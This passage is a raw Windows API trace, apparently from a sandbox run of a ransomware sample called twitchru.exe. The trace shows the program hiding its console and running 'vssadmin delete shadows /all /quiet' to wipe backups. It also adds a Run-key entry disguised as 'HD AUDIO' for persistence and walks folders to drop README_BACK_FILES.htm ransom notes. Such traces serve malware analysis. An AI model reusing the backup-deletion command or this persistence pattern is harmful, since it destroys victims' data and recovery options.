¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x209a570, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xb0\x04\xbe\x77\xac\xa8\x09\x02\x38\x22\x43", lpUsedDefaultChar=0x0) returned 256 [0230.490] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x452c88, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\twitchru.exe")) returned 0x2a [0230.491] RtlInitializeSListHead (in: ListHead=0x452928 | out: ListHead=0x452928) [0230.491] GetLastError () returned 0x0 [0230.491] SetLastError (dwErrCode=0x0) [0230.491] GetEnvironmentStringsW () returned 0x394ec0* [0230.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1359, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1359 [0230.491] FreeEnvironmentStringsW (penv=0x394ec0) returned 1 [0230.491] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40b340) returned 0x427e10 [0230.491] GetCurrentThread () returned 0xfffffffe [0230.492] GetThreadTimes (in: hThread=0xfffffffe, lpCreationTime=0x209a8e8, lpExitTime=0x209a8f0, lpKernelTime=0x209a8f0, lpUserTime=0x209a8f0 | out: lpCreationTime=0x209a8e8, lpExitTime=0x209a8f0, lpKernelTime=0x209a8f0, lpUserTime=0x209a8f0) returned 1 [0230.492] RtlInitializeSListHead (in: ListHead=0x4529d0 | out: ListHead=0x4529d0) [0230.492] GetConsoleWindow () returned 0xb005e [0230.492] ShowWindow (hWnd=0xb005e, nCmdShow=0) returned 1 [0230.513] RegGetValueA (in: hkey=0x80000001, lpSubKey="Software\\FUCK\\", lpValue="PERSONALID", dwFlags=0x2, pdwType=0x0, pvData=0x209a4e0, pcbData=0x209a4ac*=0x104 | out: pdwType=0x0, pvData=0x209a4e0, pcbData=0x209a4ac*=0x15) returned 0x0 [0230.513] CryptBinaryToStringA (in: pbBinary=0x2ec9b8, cbBinary=0x14, dwFlags=0x1, pszString=0x0, pcchString=0x209a6e4 | out: pszString=0x0, pcchString=0x209a6e4) returned 1 [0230.513] CryptBinaryToStringA (in: pbBinary=0x2ec9b8, cbBinary=0x14, dwFlags=0x1, pszString=0x209a6e8, pcchString=0x209a6e4 | out: pszString="ek1sUW1HZHBMTERGQnNxdGZlVU8=\r\n", pcchString=0x209a6e4) returned 1 [0230.513] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0230.513] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x5cc4 [0230.518] Process32First (in: hSnapshot=0x5cc4, lppe=0x209a49c | out: lppe=0x209a49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.554] Process32Next (in: hSnapshot=0x5cc4, lppe=0x209a49c | out: lppe=0x209a49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x67, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0230.554] Process32Next (in: hSnapshot=0x5cc4, lppe=0x209a49c | out: lppe=0x209a49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0230.555] Process32Next (in: hSnapshot=0x5cc4, lppe=0x209a49c | out: lppe=0x209a49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x14c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0230.556] Process32Next (in: hSnapshot=0x5cc4, lppe=0x209a49c | out: lppe=0x209a49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x14c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0230.557] Process32Next (in: hSnapshot=0x5cc4, lppe=0x209a49c | out: lppe=0x209a49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0230.557] Process32Next (in: hSnapshot=0x5cc4, lppe=0x209a49c | out: lppe=0x209a49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0230.558] Process32Next (in: hSnapshot=0x5cc4, lppe=0x209a49c | out: lppe=0x209a49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x194, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0230.558] Process32Next (in: hSnapshot=0x5cc4, lppe=0x209a49c | out: lppe=0x209a49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x194, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0230.559] Process32Next (in: hSnapshot=0x5cc4, lppe=0x209a49c | out: lppe=0x209a49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.560] Process32Next (in: hSnapshot=0x5cc4, lppe=0x209a49c | out: lppe=0x209a49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.560] Process32Next (in: hSnapshot=0x5cc4, lppe=0x209a49c | out: lppe=0x209a49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0230.561] Process32Next (in: hSnapshot=0x5cc4, lppe=0x209a49c | out: lppe=0x209a49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.562] Process32Next (in: hSnapshot=0x5cc4, lppe=0x209a49c | out: lppe=0x209a49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.562] Process32Next (in: hSnapshot=0x5cc4, lppe=0x209a49c | out: lppe=0x209a49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.563] Process32Next (in: hSnapshot=0x5cc4, lppe=0x209a49c | out: lppe=0x209a49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.563] Process32Next (in: hSnapshot=0x5cc4, lppe=0x209a49c | out: lppe=0x209a49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.564] Process32Next (in: hSnapshot=0x5cc4, lppe=0x209a49c | out: lppe=0x209a49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.565] Process32Next (in: hSnapshot=0x5cc4, lppe=0x209a49c | out: lppe=0x209a49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0230.565] Process32Next (in: hSnapshot=0x5cc4, lppe=0x209a49c | out: lppe=0x209a49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.569] Process32Next (in: hSnapshot=0x5cc4, lppe=0x209a49c | out: lppe=0x209a49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.570] Process32Next (in: hSnapshot=0x5cc4, lppe=0x209a49c | out: lppe=0x209a49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x520, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0230.570] Process32Next (in: hSnapshot=0x5cc4, lppe=0x209a49c | out: lppe=0x209a49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x608, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.571] Process32Next (in: hSnapshot=0x5cc4, lppe=0x209a49c | out: lppe=0x209a49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0230.572] Process32Next (in: hSnapshot=0x5cc4, lppe=0x209a49c | out: lppe=0x209a49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0230.572] Process32Next (in: hSnapshot=0x5cc4, lppe=0x209a49c | out: lppe=0x209a49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x69c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0230.573] Process32Next (in: hSnapshot=0x5cc4, lppe=0x209a49c | out: lppe=0x209a49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x240, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0230.574] Process32Next (in: hSnapshot=0x5cc4, lppe=0x209a49c | out: lppe=0x209a49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x978, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x240, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0230.574] Process32Next (in: hSnapshot=0x5cc4, lppe=0x209a49c | out: lppe=0x209a49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x240, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0230.575] Process32Next (in: hSnapshot=0x5cc4, lppe=0x209a49c | out: lppe=0x209a49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x784, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1a0, pcPriClassBase=8, dwFlags=0x0, szExeFile="twitchru.exe")) returned 1 [0230.575] Process32Next (in: hSnapshot=0x5cc4, lppe=0x209a49c | out: lppe=0x209a49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x784, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0230.576] Process32Next (in: hSnapshot=0x5cc4, lppe=0x209a49c | out: lppe=0x209a49c*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x784, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0230.576] CloseHandle (hObject=0x5cc4) returned 1 [0230.577] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="cmd /c vssadmin delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x100, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x209a630*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x209a61c | out: lpCommandLine="cmd /c vssadmin delete shadows /all /quiet", lpProcessInformation=0x209a61c*(hProcess=0x5cc4, hThread=0x5cc8, dwProcessId=0x36c, dwThreadId=0xb08)) returned 1 [0230.631] WaitForSingleObject (hHandle=0x5cc4, dwMilliseconds=0xffffffff) returned 0x0 [0231.160] CloseHandle (hObject=0x5cc4) returned 1 [0231.160] CloseHandle (hObject=0x5cc8) returned 1 [0231.160] GetLogicalDriveStringsA (in: nBufferLength=0x1a, lpBuffer=0x209a8e8 | out: lpBuffer="C:\\") returned 0x4 [0231.160] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0231.160] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x209a7e8, nSize=0x100 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\twitchru.exe")) returned 0x2a [0231.160] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x209a62c, lpdwDisposition=0x0 | out: phkResult=0x209a62c*=0x5cc8, lpdwDisposition=0x0) returned 0x0 [0231.160] RegSetValueExA (in: hKey=0x5cc8, lpValueName="HD AUDIO", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe", cbData=0x2a | out: lpData="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe") returned 0x0 [0231.161] RegCloseKey (hKey=0x5cc8) returned 0x0 [0231.162] SleepConditionVariableSRW (in: ConditionVariable=0x2ec4fc, SRWLock=0x2e1700, dwMilliseconds=0xffffffff, Flags=0x0 | out: ConditionVariable=0x2ec4fc, SRWLock=0x2e1700) returned 1 [0231.164] GetCurrentThreadId () returned 0x760 [0231.164] WaitForSingleObjectEx (hHandle=0x5cc8, dwMilliseconds=0xffffffff, bAlertable=0) Thread: id = 42 os_tid = 0x8ac [0231.163] GetLastError () returned 0x57 [0231.163] SetLastError (dwErrCode=0x57) [0231.163] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x760c0000 [0231.164] GetProcAddress (hModule=0x760c0000, lpProcName="AppPolicyGetThreadInitializationType") returned 0x0 [0231.164] GetCurrentThreadId () returned 0x8ac [0231.164] GetCurrentThreadId () returned 0x8ac [0231.164] RtlWakeConditionVariable (in: ConditionVariable=0x2ec4fc | out: ConditionVariable=0x2ec4fc) [0231.164] FindFirstFileA (in: lpFileName="C:\\\\*.*", lpFindFileData=0x2b9fc34 | out: lpFindFileData=0x2b9fc34) returned 0x394aa8 [0231.165] FindFirstFileA (in: lpFileName="C:\\\\$Recycle.Bin\\*.*", lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 0x394a68 [0231.165] FindNextFileA (in: hFindFile=0x394a68, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.165] FindNextFileA (in: hFindFile=0x394a68, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.165] FindNextFileA (in: hFindFile=0x394a68, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.165] FindFirstFileA (in: lpFileName="C:\\\\$Recycle.Bin\\S-1-5-18\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0xffffffff [0231.167] GetFileAttributesA (lpFileName="C:\\\\$Recycle.Bin\\S-1-5-18\\README_BACK_FILES.htm" (normalized: "c:\\$recycle.bin\\s-1-5-18\\readme_back_files.htm")) returned 0xffffffff [0231.167] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x76870000 [0231.168] GetProcAddress (hModule=0x76870000, lpProcName="AreFileApisANSI") returned 0x7688f9b0 [0231.168] LoadLibraryExW (lpLibFileName="api-ms-win-core-string-l1-1-0", hFile=0x0, dwFlags=0x800) returned 0x76510000 [0231.168] GetProcAddress (hModule=0x76510000, lpProcName="CompareStringEx") returned 0x765b4500 [0231.168] GetProcAddress (hModule=0x76510000, lpProcName="EnumSystemLocalesEx") returned 0x765ce350 [0231.168] LoadLibraryExW (lpLibFileName="api-ms-win-core-datetime-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x76510000 [0231.168] GetProcAddress (hModule=0x76510000, lpProcName="GetDateFormatEx") returned 0x7661b710 [0231.168] GetProcAddress (hModule=0x76510000, lpProcName="GetLocaleInfoEx") returned 0x765ad3f0 [0231.169] GetProcAddress (hModule=0x76510000, lpProcName="GetTimeFormatEx") returned 0x7661b9e0 [0231.169] GetProcAddress (hModule=0x76510000, lpProcName="GetUserDefaultLocaleName") returned 0x765c2510 [0231.169] GetProcAddress (hModule=0x76510000, lpProcName="IsValidLocaleName") returned 0x765ac210 [0231.169] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-obsolete-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x76510000 [0231.169] GetProcAddress (hModule=0x76510000, lpProcName="LCIDToLocaleName") returned 0x765c04a0 [0231.169] GetProcAddress (hModule=0x76510000, lpProcName="LocaleNameToLCID") returned 0x765c64c0 [0231.170] GetLastError () returned 0x5 [0231.170] SetLastError (dwErrCode=0x5) [0231.170] GetLastError () returned 0x5 [0231.170] SetLastError (dwErrCode=0x5) [0231.170] GetLastError () returned 0x5 [0231.170] SetLastError (dwErrCode=0x5) [0231.170] GetLastError () returned 0x5 [0231.170] SetLastError (dwErrCode=0x5) [0231.170] GetLastError () returned 0x5 [0231.170] SetLastError (dwErrCode=0x5) [0231.170] GetLastError () returned 0x5 [0231.171] SetLastError (dwErrCode=0x5) [0231.171] GetLastError () returned 0x5 [0231.171] SetLastError (dwErrCode=0x5) [0231.171] GetLastError () returned 0x5 [0231.171] SetLastError (dwErrCode=0x5) [0231.171] GetLastError () returned 0x5 [0231.171] SetLastError (dwErrCode=0x5) [0231.171] GetLastError () returned 0x5 [0231.171] SetLastError (dwErrCode=0x5) [0231.171] GetLastError () returned 0x5 [0231.171] SetLastError (dwErrCode=0x5) [0231.171] GetLastError () returned 0x5 [0231.171] SetLastError (dwErrCode=0x5) [0231.171] GetLastError () returned 0x5 [0231.171] SetLastError (dwErrCode=0x5) [0231.171] GetLastError () returned 0x5 [0231.172] SetLastError (dwErrCode=0x5) [0231.172] AreFileApisANSI () returned 1 [0231.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e1730, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0231.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e1730, cbMultiByte=-1, lpWideCharStr=0x2f5710, cchWideChar=48 | out: lpWideCharStr="C:\\\\$Recycle.Bin\\S-1-5-18\\README_BACK_FILES.htm") returned 48 [0231.172] CreateFileW (lpFileName="C:\\\\$Recycle.Bin\\S-1-5-18\\README_BACK_FILES.htm" (normalized: "c:\\$recycle.bin\\s-1-5-18\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.173] GetLastError () returned 0x5 [0231.173] GetLastError () returned 0x5 [0231.173] SetLastError (dwErrCode=0x5) [0231.173] GetLastError () returned 0x5 [0231.173] SetLastError (dwErrCode=0x5) [0231.173] GetLastError () returned 0x5 [0231.173] SetLastError (dwErrCode=0x5) [0231.174] GetLastError () returned 0x5 [0231.174] GetProcAddress (hModule=0x76510000, lpProcName="FlsGetValue") returned 0x765ba7b0 [0231.174] SetLastError (dwErrCode=0x5) [0231.174] GetLastError () returned 0x5 [0231.174] SetLastError (dwErrCode=0x5) [0231.174] FindNextFileA (in: hFindFile=0x394a68, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.174] FindFirstFileA (in: lpFileName="C:\\\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x394928 [0231.174] FindNextFileA (in: hFindFile=0x394928, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.174] FindNextFileA (in: hFindFile=0x394928, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.175] FindNextFileA (in: hFindFile=0x394928, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.175] FindNextFileA (in: hFindFile=0x394928, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.175] FindClose (in: hFindFile=0x394928 | out: hFindFile=0x394928) returned 1 [0231.175] GetFileAttributesA (lpFileName="C:\\\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\README_BACK_FILES.htm" (normalized: 